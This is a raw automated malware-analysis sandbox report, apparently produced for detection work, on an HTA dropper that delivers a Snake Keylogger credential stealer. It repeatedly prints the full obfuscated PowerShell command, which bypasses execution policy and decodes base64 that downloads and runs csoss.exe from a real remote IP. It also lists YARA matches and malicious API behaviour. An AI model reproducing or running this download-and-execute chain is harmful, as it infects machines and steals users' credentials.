CAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
                    Malicious sample detected (through community Yara rule)
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Binary is likely a compiled AutoIt script file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: This is a third-party compiled AutoIt script.6_2_00D03B3A
                    Source: csoss.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: csoss.exe, 00000006.00000000.1384714838.0000000000DB4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4883ed55-9
                    Source: csoss.exe, 00000006.00000000.1384714838.0000000000DB4000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_7be239e3-2
                    Source: csoss.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e5ab769a-0
                    Source: csoss.exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_9346a01c-f
                    Source: csoss[1].exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0f8192c1-a
                    Source: csoss[1].exe.3.drString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_b4cbe7a6-e
                    Powershell drops PE file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\csoss.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exeJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,6_2_00D6A1EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D58310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,6_2_00D58310
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,6_2_00D651BD
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D0E6A06_2_00D0E6A0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2D9756_2_00D2D975
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D0FCE06_2_00D0FCE0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D221C56_2_00D221C5
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D362D26_2_00D362D2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D803DA6_2_00D803DA
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D3242E6_2_00D3242E
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D225FA6_2_00D225FA
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D166E16_2_00D166E1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D5E6166_2_00D5E616
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D3878F6_2_00D3878F
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D688896_2_00D68889
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D808576_2_00D80857
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D368446_2_00D36844
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D188086_2_00D18808
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2CB216_2_00D2CB21
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D36DB66_2_00D36DB6
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D16F9E6_2_00D16F9E
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D130306_2_00D13030
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2F1D96_2_00D2F1D9
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D231876_2_00D23187
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D012876_2_00D01287
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D214846_2_00D21484
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D155206_2_00D15520
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D276966_2_00D27696
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D157606_2_00D15760
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D219786_2_00D21978
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D39AB56_2_00D39AB5
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D87DDB6_2_00D87DDB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D21D906_2_00D21D90
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2BDA66_2_00D2BDA6
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D13FE06_2_00D13FE0
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D0DF006_2_00D0DF00
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE38B86_2_00FE38B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096C1687_2_0096C168
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096A7F27_2_0096A7F2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096CA587_2_0096CA58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00962DD17_2_00962DD1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00967E687_2_00967E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00964F087_2_00964F08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_009634DD7_2_009634DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096B9D07_2_0096B9D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096B9E07_2_0096B9E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00964EF87_2_00964EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00967E597_2_00967E59
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 00D28900 appears 42 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 00D20AE3 appears 70 times
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: String function: 00D07DE1 appears 35 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.eb0000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 7.2.RegSvcs.exe.520000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 00000007.00000002.2507916337.0000000000522000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000006.00000002.1398840168.0000000000EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: csoss.exe PID: 6740, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: RegSvcs.exe PID: 5484, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winHTA@14/15@2/3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6A06A GetLastError,FormatMessageW,6_2_00D6A06A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D581CB AdjustTokenPrivileges,CloseHandle,6_2_00D581CB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,6_2_00D587E1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,6_2_00D6B3FB
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D7EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,6_2_00D7EE0D
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6C397 CoInitialize,CoCreateInstance,CoUninitialize,6_2_00D6C397
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D04E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,6_2_00D04E89
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\csoss[1].exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4508:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5w2zet0.25m.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RegSvcs.exe, 00000007.00000002.2510723580.000000000351D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000025E0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002603000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2509390080.0000000002610000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: needagoodplanforsuccesstogetbackbest.htaVirustotal: Detection: 40%
                    Source: needagoodplanforsuccesstogetbackbest.htaReversingLabs: Detection: 27%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\needagoodplanforsuccesstogetbackbest.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5CF.tmp" "c:\Users\user\AppData\Local\Temp\43swuu3x\CSC1706E7A7601C443B9125CD5A3AB1B1B7.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csoss.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\csoss.exe"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdj